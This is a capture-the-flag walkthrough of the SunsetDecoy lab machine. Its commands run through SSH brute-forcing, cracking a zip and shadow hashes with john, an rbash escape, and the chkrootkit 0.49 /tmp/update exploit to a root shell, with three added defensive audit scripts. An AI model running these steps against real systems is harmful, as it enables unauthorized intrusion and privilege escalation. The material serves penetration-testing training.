Summary
getwebshell: Found the zip file → zip has a password → john cracked the zip password → Found passwd and shadow files → Cracked the shadow password → ssh login
Privilege escalation idea: Discover background running programs → Upload pspy64 to watch them → Discover chkrootkit → chkrootkit elevates privileges
Preparation
- Start VPN and obtain the attacking machine IP → 192.168.45.194
- Start the target machine and get the target machine IP → 192.168.190.85
Information collection - port scanning
Target open port collection
- Nmap scans open ports twice (scan multiple times to reduce missed ports)
```
sudo nmap --min-rate 10000 -p- 192.168.190.85
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```
Open ports → 22, 80
Service detection for the target ports
```
# tcp detection
sudo nmap -sT -sV -O -sC -p22,80 192.168.190.85
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2
80/tcp open  http    Apache httpd 2.4.38
```
Information collection - port probing
22-SSH port information collection
22-SSH port version information and MSF utilization
Obtain the SSH version information through Nmap detection, then search for exploits that match that version.
The detected version is OpenSSH 7.9p1 Debian 10+deb10u2
```
# Search for corresponding scripts
msf6 > searchsploit openssh 7.9p1
```
22-Login methods supported by the SSH service
Use the verbose SSH client output to see which authentication methods the server offers, and try them once a user name has been obtained.
```
sudo ssh root@192.168.190.85 -v
```
The output shows publickey and password, so both key and password login are supported.
22-SSH manual login attempt (none)
Because password login is supported, try a weak password for the root account.
```
sudo ssh root@192.168.190.85 -p 22
# Password try: password > root
```
Weak password attempt failed
22-SSH weak password brute force (wait quietly)
Because password login is supported, try to brute force the root account's password with hydra, using 6 threads (-t 6)
```
sudo hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.190.85 ssh -s 22
```
Leave the brute-force tool running and continue collecting information in the meantime
80-HTTP port information collection
Accessing http://192.168.190.85:80 shows no CMS, and a zip file was found while browsing.
Use wget to download it
```
wget http://192.168.190.85/save.zip
```
Trying to open it shows that a password is required
```
┌──(root㉿Kali)-[/home/bachang/SunsetDecoy]
└─# unzip save.zip
Archive:  save.zip
[save.zip] etc/passwd password:
```
Brute force cracking - hash password cracking
```
# Use zip2john to convert the zip into a hash
zip2john save.zip > password.hash
# Use john to crack the hashed zip password offline
john --wordlist=/usr/share/wordlists/rockyou.txt password.hash
```
Got the password manuel
Extract
```
┌──(root㉿Kali)-[/home/bachang/SunsetDecoy]
└─# unzip save.zip
Archive:  save.zip
[save.zip] etc/passwd password:
  inflating: etc/passwd
  inflating: etc/shadow
  inflating: etc/group
  inflating: etc/sudoers
  inflating: etc/hosts
 extracting: etc/hostname
```
Judging from the names, these are the account and password files.
Vulnerability Exploitation - getwebshell
passwd username collection
```
┌──(root㉿Kali)-[/home/bachang/SunsetDecoy]
└─# cat etc/passwd
root:x:0:0:root:/root:/bin/bash
...
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash
```
From etc/passwd we can collect the user name
shadow encrypted password collection
```
┌──(root㉿Kali)-[/home/bachang/SunsetDecoy]
└─# cat etc/shadow
....
colord:*:18440:0:99999:7:::
hplip:*:18440:0:99999:7:::
systemd-coredump:!!:18440::::::
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::
```
From shadow we get the encrypted password
john brute force crack
```
# Use echo to write the hash line to a file for brute forcing
echo '296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::' > passwd.txt
# Use john to crack the hash offline
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt
```
Got password server
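From a defender's side, the interesting question about a leaked passwd/shadow pair is which accounts are actually worth an offline attack: those with a real hash (not locked with `*`, `!` or `!!`) and an interactive login shell. The script below is an added example, not part of the writeup; it takes a constructed excerpt of the two recovered files (only the lines shown above), joins them, names the crypt(3) algorithm from the `$id$` prefix, converts the shadow "last changed" day count into a date, and flags restricted (rbash) shells.

```python
"""Audit a leaked passwd/shadow pair: which accounts have a crackable hash and a usable shell?"""
from datetime import date, timedelta

# Constructed excerpt of the files recovered from save.zip (only the lines shown in the writeup).
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash
"""
SHADOW_SAMPLE = """\
colord:*:18440:0:99999:7:::
hplip:*:18440:0:99999:7:::
systemd-coredump:!!:18440::::::
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::
"""

# crypt(3) hash prefixes -> algorithm name
HASH_IDS = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
            "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def hash_algorithm(field):
    """Algorithm name for a shadow hash field, or None when the account is locked/passwordless."""
    if field in ("", "*") or field.startswith("!"):
        return None
    for prefix, name in HASH_IDS.items():
        if field.startswith(prefix):
            return name
    return "unknown"


def parse_passwd(text):
    """Map user name -> uid/home/shell from passwd-format text."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, _gid, _gecos, home, shell = line.split(":", 6)
        users[name] = {"uid": int(uid), "home": home, "shell": shell}
    return users


def audit(passwd_text, shadow_text):
    """Join passwd and shadow; report the accounts whose hash could be attacked offline."""
    users = parse_passwd(passwd_text)
    findings = []
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        name, hash_field, lastchg = fields[0], fields[1], fields[2]
        algo = hash_algorithm(hash_field)
        if algo is None:
            continue  # locked or disabled: nothing to crack
        shell = users.get(name, {}).get("shell", "?")
        last_change = (date(1970, 1, 1) + timedelta(days=int(lastchg))).isoformat() if lastchg else None
        findings.append({
            "user": name,
            "algorithm": algo,
            "last_change": last_change,
            "shell": shell,
            "interactive": shell not in NOLOGIN_SHELLS,
            "restricted_shell": shell.endswith("rbash"),
        })
    return findings


if __name__ == "__main__":
    for finding in audit(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(finding)
```

On this input the only crackable entry is the uid 1000 account: a sha512crypt hash last changed on 2020-07-07 (the same day the honeypot.decoy files were created) behind an rbash shell. A single salted sha512crypt hash with a rockyou-tier password is exactly what falls to john within minutes, which is why these files should never end up in a web-served archive.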
22-SSH account and password login
After obtaining the account password, log in with SSH
```
sudo ssh 296640a3b825115a47b68fc44501c828@192.168.190.85 -p22
# password → server
```
Intranet travel - getshell
After connecting, it turned out to be rbash
SSH connection restriction escape
SSH restricted shell escape via a pseudo terminal
When connecting to the remote server through SSH, various commands were found to be restricted, so escape with -t
```
# -t allocates a pseudo terminal; "bash --noprofile" starts bash without loading the user's profile
sudo ssh 296640a3b825115a47b68fc44501c828@192.168.190.85 -p22 -t "bash --noprofile"
# password → server
# Check the environment variables after the ssh login
echo $PATH
# Rewrite the PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
```
After logging in this way, commands are not found because the environment variables are not configured; the PATH value can be taken from the local machine and set on the target as above.
FLAG1 acquisition
```
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ find / -name local.txt 2>/dev/null
/home/296640a3b825115a47b68fc44501c828/local.txt
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat local.txt
f750ece6f4ea704c2902f5f7f6c10d2d
```
Information collection - basic intranet information collection
The essence of privilege escalation lies in enumeration. After obtaining a shell, we need to collect information about the host to prepare for privilege escalation
Detect the distribution version of the Linux operating system
Older Ubuntu and Linux systems may allow overlayfs privilege escalation
```
# Determine the release version
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 10 (buster)
Release:        10
Codename:       buster
```
The distribution is Debian, so it is unlikely that overlayfs can be used to escalate privileges.
Detect the kernel version of the Linux operating system
Lower kernel versions may allow Dirty Cow privilege escalation
```
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ uname -a
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
```
The kernel version is 4.19.0
Check the permissions of the current user
```
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
```
List all sudo files
Look for files that can be run with sudo without a password and used for escalation
If sudo -l shows something, look it up at https://gtfobins.github.io
```
# Use sudo -l to check
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ sudo -l
sudo: unable to resolve host 60832e9f188106ec5bcc4eb7709ce592: Name or service not known

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for 296640a3b825115a47b68fc44501c828:
Sorry, try again.
[sudo] password for 296640a3b825115a47b68fc44501c828:
Sorry, user 296640a3b825115a47b68fc44501c828 may not run sudo on 60832e9f188106ec5bcc4eb7709ce592.
```
Found that it did not work
List all suid files
If the u=s search shows something, look it up at https://gtfobins.github.io
```
# -perm matches on file permission bits
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/fusermount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
```
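The same SUID inventory is useful on the blue-team side: taken once as a baseline and re-taken later, any new setuid file stands out immediately, which is how the setuid bit later planted on /usr/bin/find in this writeup would be caught. The script below is an added example, not from the writeup. Its baseline is the find output listed above; the "current" inventory is constructed as that baseline plus /usr/bin/find, mirroring the post-escalation state. The list of shell-capable binaries is a short illustrative subset (see the GTFOBins SUID category), not an exhaustive one.

```python
"""Diff a SUID inventory against a baseline: a planted setuid bit (e.g. on find) shows up as a new entry."""
import os

# Baseline: the `find / -perm -u=s -type f` output captured during enumeration in this writeup.
BASELINE_SUID = """\
/usr/bin/newgrp
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/fusermount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
"""

# Constructed: the same inventory re-taken after compromise; /usr/bin/find now carries the setuid bit.
CURRENT_SUID = BASELINE_SUID + "/usr/bin/find\n"

# Assumed, illustrative subset of binaries that hand out a root shell almost directly when setuid.
SHELL_CAPABLE = {"find", "bash", "sh", "dash", "vim", "vi", "python", "python3",
                 "perl", "cp", "mv", "env", "less", "awk", "gawk"}


def parse_inventory(text):
    """One absolute path per line -> set of paths (blank lines ignored)."""
    return {line.strip() for line in text.splitlines() if line.strip()}


def diff_suid(baseline_text, current_text):
    """Report setuid files that appeared or disappeared, and which new ones are shell-capable."""
    base, cur = parse_inventory(baseline_text), parse_inventory(current_text)
    added = sorted(cur - base)
    removed = sorted(base - cur)
    risky = [p for p in added if os.path.basename(p) in SHELL_CAPABLE]
    return {"added": added, "removed": removed, "shell_capable_added": risky}


def remediation(report):
    """chmod commands an admin would review and run to strip unexpected setuid bits."""
    return [f"chmod u-s {path}" for path in report["added"]]


if __name__ == "__main__":
    report = diff_suid(BASELINE_SUID, CURRENT_SUID)
    print(report)
    print(remediation(report))
```

A removed entry is worth a look too: a setuid helper disappearing from the baseline can mean a package was replaced. In practice the baseline lives off-host (or in a file integrity monitor), since an attacker with root can edit anything stored locally.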
getcap flag collection
On newer systems, suid does not tell the whole story; also check getcap
```
# Detect binaries carrying file capabilities such as CAP_SETUID
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
```
List scheduled tasks
Find all scheduled tasks and check whether they can be modified
```
# Look for scheduled tasks that could be modified to escalate privileges
cat /etc/crontab
```
Looking for root privileged processes
```
# Adjust the rows and columns to make the process list easier to read
stty rows 50 cols 250
# Search the process list for processes running as root
ps aux | grep root
```
View history information (none)
The history left by the user may contain useful information
```
history
```
Confirm the information in the /home directory
The users in the /home directory can be used as an account dictionary for weak password attempts
```
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -al /home
drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Aug 27  2020 296640a3b825115a47b68fc44501c828
```
Confirm whether there are hidden files in the current user's home directory
```
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27 2020 .bash_logout
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3583 Jun 27 2020 .bashrc
-rwxr-xr-x 1 root root 17480 Jul 7 2020 honeypot.decoy
-rw------- 1 root root 1855 Jul 7 2020 honeypot.decoy.cpp
lrwxrwxrwx 1 root root 7 Jun 27 2020 id -> /bin/id
lrwxrwxrwx 1 root root 13 Jun 27 2020 ifconfig -> /bin/ifconfig
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 33 Jul 30 10:37 local.txt
lrwxrwxrwx 1 root root 7 Jun 27 2020 ls -> /bin/ls
lrwxrwxrwx 1 root root 10 Jun 27 2020 mkdir -> /bin/mkdir
-rwxr-xr-x 1 root root 807 Jun 27 2020 .profile
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 66 Jun 27 2020 .selected_editor
-rwxrwxrwx 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 32 Aug 27 2020 user.txt
```
A suspicious file was seen: honeypot.decoy is executable, but its source honeypot.decoy.cpp is readable only by root
Since the source cannot be read, try running the program
```
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------
Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
```
Found several functions
Option 5 is interactive and executes something, but its output cannot be seen
It says the scan will start within 60 seconds. This hints that a process runs in the background, and we might want to take a closer look
Pspy view process
Pspy is a command line tool for spying on processes without requiring root privileges. It lets you view the commands, cron tasks, etc. run by other users as they execute. The tool loops over the entries under /proc to obtain process argument information.
Download the pspy64 binary from the project's GitHub releases page (https://github.com/DominicBreuker/pspy) on the attacking machine, then serve it:
```
# Use python to start an http service so the target can download the file
sudo python3 -m http.server 80
```
On the target:
```
# Download
wget http://192.168.45.194:80/pspy64
# Give execute permission
chmod +x pspy64
# run
./pspy64
```
After uploading pspy64, run it and check for any activity
Found that /bin/sh /root/chkrootkit-0.49/chkrootkit was executed
Elevation of privileges
chkrootkit privilege escalation
It is found that chkrootkit is run by the program
```
searchsploit chkrootkit
```
It can be seen that there is an entry for exactly version 0.49
```
cat /usr/share/exploitdb/exploits/linux/local/33899.txt
```
A closer look shows that a file named update placed under /tmp will be run with root permissions.
Constructing a malicious update then lets me escalate privileges
```
# Move to /tmp
cd /tmp
# Write the privilege escalation payload
echo '#!/bin/sh
chmod +s /usr/bin/find' > update
# Add execute permission
chmod +x update
# Check find permissions
which find
ls -al /usr/bin/find
# find suid privilege escalation
find . -exec /bin/bash -p \; -quit
```
```
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ ls -al /usr/bin/find
-rwsr-sr-x 1 root root 315904 Feb 16  2019 /usr/bin/find
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ find . -exec /bin/bash -p \; -quit
bash-5.0# id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) euid=0(root) egid=0(root) groups=0(root),1000(296640a3b825115a47b68fc44501c828)
bash-5.0#
```
Successfully escalated privileges
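Seen from the administrator's side, this chain needs three things at once: a chkrootkit older than 0.50 (the release that removed the unquoted variable which made it execute /tmp/update), a root cron job running it, and a writable /tmp/update. The script below is an added example for auditing a host for that combination; it is not from the writeup. It assumes the chkrootkit shell script states its version as `CHKROOTKIT_VERSION='0.49'` (the regex is ours), reads cron entries in /etc/crontab format, and in `run_demo()` rebuilds the state from this writeup with constructed inputs in a temporary directory.

```python
"""Check a host for the chkrootkit 0.49 exposure: old chkrootkit run as root by cron while /tmp/update exists."""
import os
import re
import stat
import tempfile

# Assumption: the chkrootkit script sets its version as CHKROOTKIT_VERSION='x.yy'.
VERSION_RE = re.compile(r"CHKROOTKIT_VERSION=['\"]?([0-9]+\.[0-9]+)")
FIXED_VERSION = (0, 50)  # 0.50 stopped chkrootkit from executing /tmp/update as root


def chkrootkit_version(script_text):
    """Parse the version tuple out of the chkrootkit script text, or None if absent."""
    m = VERSION_RE.search(script_text)
    if not m:
        return None
    major, minor = m.group(1).split(".")
    return (int(major), int(minor))


def root_cron_entries(cron_text, needle="chkrootkit"):
    """Lines of an /etc/crontab-style file (min hour dom mon dow user command) that run `needle` as root."""
    hits = []
    for line in cron_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)
        if len(parts) == 7 and parts[5] == "root" and needle in parts[6]:
            hits.append(line)
    return hits


def planted_update(tmp_dir):
    """Describe tmp_dir/update if present: owner and whether it is executable."""
    path = os.path.join(tmp_dir, "update")
    if not os.path.lexists(path):
        return None
    st = os.lstat(path)
    return {"path": path, "owner_uid": st.st_uid,
            "executable": bool(st.st_mode & stat.S_IXUSR),
            "non_root_owner": st.st_uid != 0}


def assess(script_text, cron_text, tmp_dir="/tmp"):
    """Return human-readable findings; an empty list means nothing to act on."""
    findings = []
    ver = chkrootkit_version(script_text)
    vulnerable = ver is not None and ver < FIXED_VERSION
    if vulnerable:
        findings.append(f"chkrootkit {ver[0]}.{ver[1]} is older than 0.50: upgrade it")
    cron = root_cron_entries(cron_text)
    if vulnerable and cron:
        findings.append(f"vulnerable chkrootkit is run as root by cron: {cron[0]}")
    upd = planted_update(tmp_dir)
    if upd and (upd["executable"] or upd["non_root_owner"]):
        findings.append(f"suspicious {upd['path']} (uid {upd['owner_uid']}, "
                        f"executable={upd['executable']}): inspect and remove")
    return findings


def run_demo():
    """Rebuild the state from the writeup with constructed inputs in a temp dir and assess it."""
    tmp = tempfile.mkdtemp()
    update_path = os.path.join(tmp, "update")
    with open(update_path, "w") as f:
        f.write("#!/bin/sh\n")  # constructed stand-in; its content is irrelevant to the check
    os.chmod(update_path, 0o755)
    script = "#!/bin/sh\nCHKROOTKIT_VERSION='0.49'\n"  # constructed snippet in the assumed format
    cron = "* * * * * root /bin/sh /root/chkrootkit-0.49/chkrootkit\n"  # constructed; matches what pspy showed
    return assess(script, cron, tmp)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Running it against a real host means passing the text of the installed chkrootkit script and of /etc/crontab (plus /etc/cron.d entries) instead of the constructed strings. The version check alone is the durable fix; the /tmp/update check only catches an attempt already in progress.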
FLAG2 acquisition
```
bash-5.0# cat /root/proof.txt
462b67a92407c2b0d746f9298fbfa2f6
```
All done, flowers all round~
Summary
When you have no idea, you can upload pspy64 to try to discover the processes running as root